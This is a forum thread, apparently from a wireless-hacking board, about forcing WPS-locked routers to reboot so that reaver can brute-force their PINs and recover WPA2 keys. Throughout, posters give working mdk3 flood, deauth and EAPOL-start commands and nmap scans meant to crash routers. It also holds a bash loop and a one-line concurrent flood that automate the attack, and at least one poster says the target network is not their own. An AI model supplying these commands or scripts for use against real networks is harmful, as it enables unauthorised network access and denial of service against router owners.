Have you tested it yet?.
Printable View
We posted the matter of resetting routers in aircrack-ng forums and got the following:
http://forum.aircrack-ng.org/index.php/topic,468.0.html
madafakaz
Newbie
Re: Reseting Routers Remotely
« Reply #3 on: January 18, 2014, 08:35:57 am »Quote
--------------------------------------------------------------------------------
your success with this really depends on router manufacturer and hardware used
i have successfully managed to reboot tg782i router but only when connected to it's wifi
if you are interested in exploring this the process involves running a couple of concurent nmap scans. i usually open 4-5 terminal windows and run nmap -v -A xxx.xxx.xxx.xxx
once the basic scans are done and nmap script engine launches scripts against a router it freezes and restarts. sometimes it's neccessary to repeat the process a few times but if you could narrow down the script that does this it might be useful to try to forge a packet that could be sent in monitor mode.
the mentioned router uses crappy broadcom chipset and it's very likely other thomson/technicolor models are vulenerable to this bug
sorry if i should of started another thread but i have a real basic question about mdk3 whitelist. I know i am to type
does this mean that I type the path to the filename or is this file already existing and I just add the mac address' to this file? if so, where is this file?Code:mdk3 mon0 d -w <filename>
I typed a path to the file that I created, but it was not found.
sorry for the n00b question.
hi everyone
My only question how do i know if i secsesfully reseted a router or not? coz i do the same thing and everything is fine but nothing happens for ages.. The router wont chage to wpa2 sign to wpa. the channel doesnt go to -1.. What can i do? Because its not my own wifi that im already connected to.. So how do i know? Or i didnt even reset the router? When can i start reaver attack?
Thank you
Hi, i can now sucsesfully work with mdk3. The only question i got at the moment is that how do i know if i reseted the router sucsesfully or not? Because i run mdk3 for ages and nothing happens . The chanel wont change to -1 and and the wpa2 is not changing to wpa.. how do i know when to start reaver??
Many thanks
Thank you! It works!)))
Is it possible start and stop mdk3 automatically? Like rever (-r x:y).
Starting mdk3 for freezing AP, wait some time (about 2 min) and start again.
I think if it possible we can run in second terminal window start a reaver for finding wps (-r x:y) . If AP LOCKed mdk3 each 2 min reset it.)))))
hello ppl
i tried test in my D LINK router Mdk3:
sudo mdk3 mon0 a -a 00:11:22:33:44:55 -m
sudo mdk3 mon0 b -a 00:11:22:33:44:55 -n " name_of_AP" -h -c [no of channel]
sudo mdk3 mon0 d -a 00:11:22:33:44:55 -c [no of channel]
sudo mdk3 mon0 m -t 00:11:22:33:44:55
Then test with:
sudo wash -i mon0 -C
finely just frozen and i tried reset by my hand and i checked sudo wash -i mon0 -C nothing display NO LOCKED WPS
please any help ppl
Thank you for the reply! What should appear with "wash" ? what should i see when i open that?
Because when i type was -i mon0
This is what i can see:
And i dont know when i can start the reaver to get the wpa2 key. Please help me.
Found packet with bad FCS, skipping...
Found packet with bad FCS, skipping...
Found packet with bad FCS, skipping...
Found packet with bad FCS, skipping...
Found packet with bad FCS, skipping...
Hi everyone! Thank you for all the replies. Im really stuck with hacking the wpa2 routers. Now the wpa2 wps switches to NO (so its not unlcoked) but when i start reaver i still get the "60 second re trying" thing. Is there anyone who can guide me from mdk3 throug reaver to the end? i wouldnt mind using teamviewer either. I would be very pleased, and more then appriciate it. Any comment, response helps!!!
hello guys ,To soxrok2212 please tell me why my D-LINK wont reset after i test what you wrote in your topic although i follow all sudo mdk3 mon0 a -asudo mdk3 mon0 b -asudo mdk3 mon0 d -asudo mdk3 mon0 m -t and Then test with:
sudo wash -i mon0 -C just has frozen ,and i reset it manual but the no wps locked not shone , please i need help ?
Hello All,
Any clue where the original posting went? I was showing a buddy the guide that was written out, but noticed it says content deleted. Does anyone have the original?
Thanks!
Hello All,
Any clue where the original posting went? I was trying to show a buddy the post, but noticed that the "Content Deleted" on the original post. Anyone have the original guide?
Thank you very much !! It helped but didnt solve my problem... I used your code and at least i didnt get the "re-trying in 60 seconds" thing. but it is stuck on 0.04% and doesnt wanna go further... so its the same as it would have the 60 seconds retrying..
Im really confused how i could hack this wps locked wpa2-psk router..
Maybe could you tell me your email so we can talk or teamviewer or vnc? Or if you dont want that we can keep messaging here! I dont want to give up:) And thanks everyone for helping!
Just please someone tell me what to do. Maybe i didnt unlock the wps sucsessfully?
Have a look here http://code.google.com/p/reaver-wps/.../detail?id=167
I havn't read through it myself but that is the main area for problems related to reaver or do a google search for "WPS transaction failed (code 0x02)"
Rab.
Here is what i am using to get around locks...
while :; do echo
echo "starting reaver...";
echo y|reaver -i mon0 -b <bssid> -c <channel#> -g 5 -vv
echo ...
echo ...
echo ...
timeout 10s mdk3 mon0 a -a <bssid> -m
sleep 60
done
First off, you need to run "apt-get timeout install" to get the timeout app. After that the script should work. The first part is starting reaver and restoring session and executing 5 attempts before exiting. The second part is executing the mdk3 command that will timeout after 10 seconds of it running. at this point, the router should be rebooting (atleast the one im trying it on did). Next put a sleep for 60 seconds to allow the router to reboot and then the script will loop back to the beginning.
hello FAHQ please please explain more, how can i put the commands ?
hello is there any help from you FAHQ ?
hello ppl is there any trick to unlock locked wps ?
any clue guys ?
Make a blank document in your root folder called reset.sh. Then, open the document in a text editor and paste this into it:
Replace the values inside the code with the values of your target. If you don't know what I mean by that, then learn the basics of aircrack and reaver.Code:while :; do echo
echo "starting reaver...";
echo y|reaver -i mon0 -b <bssid> -c <channel#> -g 5 -vv
echo ...
echo ...
echo ...
timeout 10s mdk3 mon0 a -a <bssid> -m
sleep 60
done
When you're done, open terminal and run:
Code:bash reset.sh
To everyone-another effective method to unlock wps mechanism on a wps router!
Quote Originally Posted by repzeroworld View Post
TO: EVERYONE- EFFECTIVE WAY TO RESET A MODERN CISCO ACCESS POINT BY FLOODING FOR 10-20 SECONDS!
i have found a way to effectively flood a new model (either year 2012/2013 manufactured) cisco router to make it reboot with a wps locked
status as "NO". Also i will prove that using Authentication DOS mode flooding has no effects of flooding THIS router!
DETAILS OF THIS ROUTER
From one of the M1 EAP packets captured from my wireless card, details of this router are as follows
bssid c8:d7:19:0a:bf:35
Manufacturer: Cisco
Model Number: 123
Serial Number: 12345
Model Name: WAP
Channel type: 802.11g (pure-g) (0x00c0)
I did some research using these details found found out that this access point was modern in age.
Behaviour of this CISCO Router
This type of router is not affected by a script changing your mac address. Also if you try a 3 pins the router starts
an exponential clock that rate limit another counple of pins reaver tries and then the router totally lock itself for one/two day.
even if i gave reaver the option to try 1 pin every 3 minutes (worthless).. after a couple of pin attempts it locks up one/two days.
I will release my method for sure..gave me a couple of days for a nice video presentation!
EFFECTS OF USING MY METHOD
I haven't seen anyone discussing the method which i am going to reveal but it relates using mdk3
After using my method the router reboot and it needed sometime to "thaw off" before sending EAP again...this is roughly aorund
a couple of seconds..if you don't leave it to thaw off and use the reaver command, you will recieve alot of EAP timeout messages before
the router catches itself.but it is worth it rather than waiting for days for the router to unlock itself!!Also, it hops to another channel when it reboots so it
is not wise to run reaver with a -c flag...i suppose this COULD part of cisco security mechanism feature..
ANOTHER EFFECTIVE WAY TO REBOOT A WPS ACCESS POINT AND RESET WPS LOCKED STATUS TO “NO”
THIS LINK *REMOVED* HAS A VIDEO I HAVE DONE TO SHOW HOW I USE THE TWO ATTACKS AND WHICH ONE WAS MORE EFFECTIVE WITH THIS PARTICULAR AP.
BRIEF NOTES
I focused on the stated Cisco Access Point that I came across with the new exponential wps mechanism.
THE TWO ATTACKS I USED ARE:
1. MDK3 Authentication DOS Flood Attack- floods the AP with too much fake clients so that the router is overloaded
2. EAPOL Start Flood Attack- Authenticates to the AP and sends too much EAPOL Start requests so that the router is unable to respond to the volume of EAPOL requests and reboot itself.
MDK3 AUTHENTICATION DOS FLOOD ATTACK
This attack is useful on SOME routers. The important point to note is HOW I USE THESE ATTACKS!.
( I have three wireless adapter- AWUS036NHA, AWUS036NH and TP-LINK 722N and I use AWUS036NHA and AWUS036NH to carry out this attack numerous times)
HOW I ATTACKED THIS ACCESS POINT USING AUTHENTICATION DOS FLOOD ATTACK
I started my wireless card on three monitor interface, mon0, mon1 and mon2
In three terminal, I use the command line
mdk3 mon0 a –a C87:19:0A:BF:35 #TERMINAL 1
mdk3 mon1 a –a " " " # TERMINAL 2
mdk3 mon1 a –a " " " #TERMINAL 3
Note:
I ensure that the router was wps locked permanently so that I can test the effectiveness of the attack. Also, a point to note, I did not use one command line with one monitor interface since it was futile. I blasted the router on three monitor interfaces!.Now I am blasting away the router for hours!. After blasting away the Access Point is still locked! I tried this attack for days to convince myself!.
MDK3 EAPOL START FLOOD ATTACK
I started my wireless card on three monitor interface, mon0, mon1 and mon2
mdk3 mon1 x 0 –t C87:19:0A:BF:35 –n Riznet –s 100 #TERMINAL 1 (SEE VIDEO FOR REASON OF USING –S 100 FLAG)
mdk3 mon1 x 0 –t " " " –n Riznet –s 100 # TERMINAL 2
mdk3 mon1 x 0 –t " " " –n Riznet –s 100 #TERMINAL 3
Note: I tried again using 1 monitor interface to carry out the attack but it took hours for the router to reboot and I was not sure if the attack was the main reason for the router rebooting!. In this scenario I tried blasting the router in three terminals. This “Shock Attack” method ran for about 20 seconds and the router reboot with wps locked status as “NO”. I TRIED THIS ATTACK A COUPLE MORE TIMES FOR ABOUT 20 SECONDS WITH THE ACCESS POINT REBOOTING AND UNLOCKING ITSELF (WPS) !!. Also packet analysis significantly helped me to understand the connection between EAPOL and a router behavior to open authentication request which makes it impossible to stick to one method for flooding ALL AP (see the video link above).
BASH SCRIPT WRITING
Soon I will write a bash script to execute all the steps in my video (I need time to chill….).
OTHER ACCESS POINTS INVESTIGATED
I Have Also Assessed The Behaviour Of Three Other Cisco Access Points That Rate Limit Pin In A Systematic Way But Did Not Locked Up in an exponential manner!. I will give gave an update if I do come across any other access points that behaved somewhat different. Do share your experience in relation to any new updates on wps!
Your approach is both novel and intriguing. Those involved with the matter of reseting routers remotely should study this closely.
We realize successful WPS reset is dependent on a number of factors to include router make,signal strength and clients associated just to name a few. However Musket Teams will attempt to duplicate your results - however we will only report if we are successful.
hello hello friends thank you so much soxrok2212 you are great guy i am so grateful for your help
..........
TO: EVERYONE-THREE OTHER ACCESS POINTS THAT WERE DEFEATED BY THE MDK3 EAPOL START ATTACK!!
I have underestimated this attack!. IT WORKS ON ALMOST ALL THE AP THAT I PICKED UP THAT HAS THE WPS RATE LIMITING FEATURE..
Despite some AP refuses to accept to many eapol packets, one mdk3 authenticates it floods the AP quickly until a deauthentication
packet is sent from the AP to break the connection.
FOR FURTHER PROOF CHECK ANOTHER VIDEO IS POST ON MY CHANNEL
LINK *REMOVED*
Also, instead of running three attacks in three terminal, i used one terminal to carry out three attacks RUNNING AT THE SAME TIME using
EXAMPLE
#timeout <seconds> mdk3 mon0 x 0 -t <bssid> -n <essid> -s <no. of packets/sec> & timeout <seconds> mdk3 mon1 x 0 -t <bssid> -n <essid> -s <no. of packets/sec) & timeout <seconds> mdk3 mon2 x 0 -t <bssid> -n <essid> -s <no. of packets/sec>
PENDING: I AM CURRENTLY WRITTING A GENERAL INTERACTIVE BASH SCRIPT TO CARRY OUT ANY MDK3 ATTACK USING MY METHOD WITH REAVER! I WILL POST ONCE FULLY FINSHED.IF ANYONE HAS A SCRIPT FOR REAVER AND MDK3 (TO CARRY OUT ANY ATTACKS) DO SHARE SO THAT I CAN COMPARE IT WITH MY WORK IN PROGRESS SCRIPT!
I have finally finished a script that took me a couple of days to complete. i would be grateful if others can test this out. what the script does.
1. It ask the user information on the target
2. It runs reaver and waits when reaver detects the AP is rate limiting pin
3. when the AP is 'rate limting pins' , the script pause reaver and floods the AP for a time you choose
4. after flooding, it detects if the AP is still rate limiting pins, if it is, then it continues to flood the AP until it unlocks itself
5. Once WPS is unlocked, the script continues reaver
those interested in testing can send me a email or a private message on my channel.
*REMOVED*
cheers!
The script is also shared through torrent but it takes a while to upload. the link below is the location of the torrent
http://www.legittorrents.info/index....&page=torrents
Wow, I never expected to see this thread reach 50,000 views. I guess its pretty popular. I'm very doubtful here, but is there anyone who knows how to make a full GUI with all the methods posted by various users here? It would include options of:
1.) mac changing after a specified number of pin trials
2.) reaver incorporated, of course ;D
3.) MDK3 auth flodd
4.) beacon flood
5.) MIC failure
6.) deauth
7.) EAPOL failure
More??
It would just be nice to have a full GUI for EVERYTHING posted by users here... plus having a few terminal windows open and typing in the commands every time is a bit annoying. I'm not talking a script here, a full blown GUI.
I'm doubtful but the community here is pretty big. And maybe, just maybe we could get it pushed to be a standard tool in Kali!